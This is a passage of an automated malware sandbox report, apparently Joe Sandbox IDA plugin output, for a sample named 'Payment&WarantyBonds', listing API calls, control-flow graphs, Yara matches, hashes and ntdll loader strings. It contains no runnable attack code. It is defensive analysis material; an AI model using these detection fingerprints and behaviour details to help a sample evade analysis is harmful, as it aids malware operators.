                                                                                                                                                                                • Source File: 00000002.00000002.2020861134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Load
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2234796835-0

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                control_flow_graph 201 42c483-42c4bf call 404653 call 42d6c3 NtClose
                                                                                                                                                                                APIs
                                                                                                                                                                                • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C4BA
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2020861134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Close
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3535843008-0

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                control_flow_graph 215 1842b60-1842b6c LdrInitializeThunk
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                control_flow_graph 217 1842df0-1842dfc LdrInitializeThunk
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 216 1842c70-1842c7c LdrInitializeThunk
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 218 18435c0-18435cc LdrInitializeThunk
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                • PostThreadMessageW.USER32(4648H9mUM,00000111,00000000,00000000), ref: 00413F70
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2020861134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MessagePostThread
                                                                                                                                                                                • String ID: 4648H9mUM$4648H9mUM
                                                                                                                                                                                • API String ID: 1836367815-3945090275

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 14 413ea5-413f03 16 413f0c-413f61 call 42efd3 call 417643 call 4045c3 call 424d13 14->16 17 413f07 call 42e5c3 14->17 26 413f83-413f88 16->26 27 413f63-413f74 PostThreadMessageW 16->27 17->16 27->26 28 413f76-413f80 27->28 28->26
                                                                                                                                                                                APIs
                                                                                                                                                                                • PostThreadMessageW.USER32(4648H9mUM,00000111,00000000,00000000), ref: 00413F70
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2020861134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MessagePostThread
                                                                                                                                                                                • String ID: 4648H9mUM$4648H9mUM
                                                                                                                                                                                • API String ID: 1836367815-3945090275

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 29 413ef3-413f03 31 413f0c-413f61 call 42efd3 call 417643 call 4045c3 call 424d13 29->31 32 413f07 call 42e5c3 29->32 41 413f83-413f88 31->41 42 413f63-413f74 PostThreadMessageW 31->42 32->31 42->41 43 413f76-413f80 42->43 43->41
                                                                                                                                                                                APIs
                                                                                                                                                                                • PostThreadMessageW.USER32(4648H9mUM,00000111,00000000,00000000), ref: 00413F70
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2020861134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MessagePostThread
                                                                                                                                                                                • String ID: 4648H9mUM$4648H9mUM
                                                                                                                                                                                • API String ID: 1836367815-3945090275

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 196 42c803-42c844 call 404653 call 42d6c3 RtlFreeHeap
                                                                                                                                                                                APIs
                                                                                                                                                                                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,5057E845,00000007,00000000,00000004,00000000,00416F27,000000F4), ref: 0042C83F
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2020861134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FreeHeap
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3298025750-0

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 191 42c7b3-42c7f7 call 404653 call 42d6c3 RtlAllocateHeap
                                                                                                                                                                                APIs
                                                                                                                                                                                • RtlAllocateHeap.NTDLL(?,0041E40B,?,?,00000000,?,0041E40B,?,?,?), ref: 0042C7F2
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2020861134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1279760036-0

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 206 42c853-42c88f call 404653 call 42d6c3 ExitProcess
                                                                                                                                                                                APIs
                                                                                                                                                                                • ExitProcess.KERNEL32(?,00000000,00000000,?,B5727CFB,?,?,B5727CFB), ref: 0042C88A
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2020861134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ExitProcess
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 621844428-0
                                                                                                                                                                                • Opcode ID: 64d2dd0f805d5c374ef794ce1e7e794fe0ea545bc6e9901331b0f9e010597a2a
                                                                                                                                                                                • Instruction ID: bc802583a2c2c609f8f687f00da689e9d4c98de31bfd4ded7f3633e7ceebd465
                                                                                                                                                                                • Opcode Fuzzy Hash: 64d2dd0f805d5c374ef794ce1e7e794fe0ea545bc6e9901331b0f9e010597a2a
                                                                                                                                                                                • Instruction Fuzzy Hash: 11E04F316002147BD110BB6ADC05FDB776CDFC6714F00441AFE5867242CA75790087B5

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                control_flow_graph 211 1842c0a-1842c0f 212 1842c11-1842c18 211->212 213 1842c1f-1842c26 LdrInitializeThunk 211->213
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: 510223f9b684263e23cff47cb3a62f0273c34362a4d0a0e50aaf7bc620a89aec
                                                                                                                                                                                • Instruction ID: f63c336f628adabc7766a7891f16d9a29cf4172be41f5933b5ba880c2356e11a
                                                                                                                                                                                • Opcode Fuzzy Hash: 510223f9b684263e23cff47cb3a62f0273c34362a4d0a0e50aaf7bc620a89aec
                                                                                                                                                                                • Instruction Fuzzy Hash: FAB09B719055C5CADB52E76456087177D01B7D1701F15C062F3034641F4778C2D5E676
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                • API String ID: 0-2160512332
                                                                                                                                                                                • Opcode ID: 18e644847a58b5706c89d0af11a18b2afdd5ac5e8aaa6f3194466662fc16a83c
                                                                                                                                                                                • Instruction ID: 3a9b0cc0427d0df2a14293f6f5d242b8b8a7194cd92d474c90adc91f8f135f08
                                                                                                                                                                                • Opcode Fuzzy Hash: 18e644847a58b5706c89d0af11a18b2afdd5ac5e8aaa6f3194466662fc16a83c
                                                                                                                                                                                • Instruction Fuzzy Hash: 7E929E71608746AFE721EE18C880F6BBBEABF84714F04491DFA94D7251D770EA44CB92
                                                                                                                                                                                Strings
                                                                                                                                                                                • Thread identifier, xrefs: 0187553A
                                                                                                                                                                                • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018754E2
                                                                                                                                                                                • corrupted critical section, xrefs: 018754C2
                                                                                                                                                                                • Address of the debug info found in the active list., xrefs: 018754AE, 018754FA
                                                                                                                                                                                • Critical section address, xrefs: 01875425, 018754BC, 01875534
                                                                                                                                                                                • Invalid debug info address of this critical section, xrefs: 018754B6
                                                                                                                                                                                • Thread is in a state in which it cannot own a critical section, xrefs: 01875543
                                                                                                                                                                                • double initialized or corrupted critical section, xrefs: 01875508
                                                                                                                                                                                • Critical section address., xrefs: 01875502
                                                                                                                                                                                • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018754CE
                                                                                                                                                                                • undeleted critical section in freed memory, xrefs: 0187542B
                                                                                                                                                                                • 8, xrefs: 018752E3
                                                                                                                                                                                • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0187540A, 01875496, 01875519
                                                                                                                                                                                • Critical section debug info address, xrefs: 0187541F, 0187552E
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                                                                                • API String ID: 0-2368682639
                                                                                                                                                                                • Opcode ID: 15d2795863d36c00180f773a96c4fa5aad9387f44a49c1add55e36465a96a638
                                                                                                                                                                                • Instruction ID: 2a64b600bfecb6cb10e453c75b3711a886c9e7cfd89062f14c4d945452d5e545
                                                                                                                                                                                • Opcode Fuzzy Hash: 15d2795863d36c00180f773a96c4fa5aad9387f44a49c1add55e36465a96a638
                                                                                                                                                                                • Instruction Fuzzy Hash: D5818AB1A00358AFDB20CF99C888BAEBBF5FB49704F244119F504F7290D775AA40CBA1
                                                                                                                                                                                Strings
                                                                                                                                                                                • RtlpResolveAssemblyStorageMapEntry, xrefs: 0187261F
                                                                                                                                                                                • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01872602
                                                                                                                                                                                • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 018722E4
                                                                                                                                                                                • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01872498
                                                                                                                                                                                • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 018725EB
                                                                                                                                                                                • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 018724C0
                                                                                                                                                                                • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01872506
                                                                                                                                                                                • @, xrefs: 0187259B
                                                                                                                                                                                • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01872409
                                                                                                                                                                                • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01872412
                                                                                                                                                                                • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01872624
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                                                                                                • API String ID: 0-4009184096
                                                                                                                                                                                • Opcode ID: 6658687bd448ec4ed070cd630c34b583261879bc04b5175e1e5fe6e92cb34757
                                                                                                                                                                                • Instruction ID: 1fcff6de5e3dc45206aea32cd901f1b5a19f023bf95e1bdd9f590786cd41b9fa
                                                                                                                                                                                • Opcode Fuzzy Hash: 6658687bd448ec4ed070cd630c34b583261879bc04b5175e1e5fe6e92cb34757
                                                                                                                                                                                • Instruction Fuzzy Hash: B5025EF1D002299BDB31DB58CC80B9AB7B9AF54314F0441EAA709E7241EB709F85CF99
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                                                                                                • API String ID: 0-2515994595
                                                                                                                                                                                • Opcode ID: 5ddb97e52f3772710528a89382de8eb2abefe6c2ec9b41822bf8508372b97659
                                                                                                                                                                                • Instruction ID: 39e838fb673d6d672de22f6b4c706f95462bfa113cfb183e21c77aaef7ec4efc
                                                                                                                                                                                • Opcode Fuzzy Hash: 5ddb97e52f3772710528a89382de8eb2abefe6c2ec9b41822bf8508372b97659
                                                                                                                                                                                • Instruction Fuzzy Hash: 5351D4715043199BE329DF188844BABBBE8FF95345F94492DEA98C3241E770D704CBE2
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                                                                                • API String ID: 0-1700792311
                                                                                                                                                                                • Opcode ID: 7ef7f6a00d67fe89e056131a48dd82c59f619a4670aa4183f7d243ebee1cf1d0
                                                                                                                                                                                • Instruction ID: 859cb674908ac2eef1143725e93dc3c5a07eec04c7b365b4ae0a32049fd2cf57
                                                                                                                                                                                • Opcode Fuzzy Hash: 7ef7f6a00d67fe89e056131a48dd82c59f619a4670aa4183f7d243ebee1cf1d0
                                                                                                                                                                                • Instruction Fuzzy Hash: 18D1973150068ADFDB26DF68C494AAAFBB1FF4A714F18805DE545DB752C734AA81CB10
                                                                                                                                                                                Strings
                                                                                                                                                                                • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01888A67
                                                                                                                                                                                • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01888A3D
                                                                                                                                                                                • VerifierDebug, xrefs: 01888CA5
                                                                                                                                                                                • HandleTraces, xrefs: 01888C8F
                                                                                                                                                                                • AVRF: -*- final list of providers -*- , xrefs: 01888B8F
                                                                                                                                                                                • VerifierDlls, xrefs: 01888CBD
                                                                                                                                                                                • VerifierFlags, xrefs: 01888C50
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                                                                                                • API String ID: 0-3223716464
                                                                                                                                                                                Strings
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                                                                                                • API String ID: 0-1109411897
                                                                                                                                                                                Strings
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                • API String ID: 0-792281065
                                                                                                                                                                                Strings
                                                                                                                                                                                • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01859A01
                                                                                                                                                                                • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 018599ED
                                                                                                                                                                                • apphelp.dll, xrefs: 017F6496
                                                                                                                                                                                • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01859A2A
                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 01859A11, 01859A3A
                                                                                                                                                                                • LdrpInitShimEngine, xrefs: 018599F4, 01859A07, 01859A30
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                • API String ID: 0-204845295
                                                                                                                                                                                Strings
                                                                                                                                                                                • Loading import redirection DLL: '%wZ', xrefs: 01878170
                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 0183C6C3
                                                                                                                                                                                • minkernel\ntdll\ldrredirect.c, xrefs: 01878181, 018781F5
                                                                                                                                                                                • Unable to build import redirection Table, Status = 0x%x, xrefs: 018781E5
                                                                                                                                                                                • LdrpInitializeProcess, xrefs: 0183C6C4
                                                                                                                                                                                • LdrpInitializeImportRedirection, xrefs: 01878177, 018781EB
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                                                                                • API String ID: 0-475462383
                                                                                                                                                                                Strings
                                                                                                                                                                                • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0187219F
                                                                                                                                                                                • RtlGetAssemblyStorageRoot, xrefs: 01872160, 0187219A, 018721BA
                                                                                                                                                                                • SXS: %s() passed the empty activation context, xrefs: 01872165
                                                                                                                                                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 018721BF
                                                                                                                                                                                • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01872178
                                                                                                                                                                                • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01872180
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                                                                                • API String ID: 0-861424205
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 01842DF0: LdrInitializeThunk.NTDLL ref: 01842DFA
                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01840BA3
                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01840BB6
                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01840D60
                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01840D74
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1404860816-0
                                                                                                                                                                                Strings
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                                                                                • API String ID: 0-379654539
                                                                                                                                                                                Strings
                                                                                                                                                                                • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0183855E
                                                                                                                                                                                • @, xrefs: 01838591
                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 01838421
                                                                                                                                                                                • LdrpInitializeProcess, xrefs: 01838422
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                • API String ID: 0-1918872054
                                                                                                                                                                                Strings
                                                                                                                                                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 018722B6
                                                                                                                                                                                • SXS: %s() passed the empty activation context, xrefs: 018721DE
                                                                                                                                                                                • .Local, xrefs: 018328D8
                                                                                                                                                                                • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 018721D9, 018722B1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                                                                                • API String ID: 0-1239276146
                                                                                                                                                                                Strings
                                                                                                                                                                                • RtlDeactivateActivationContext, xrefs: 01873425, 01873432, 01873451
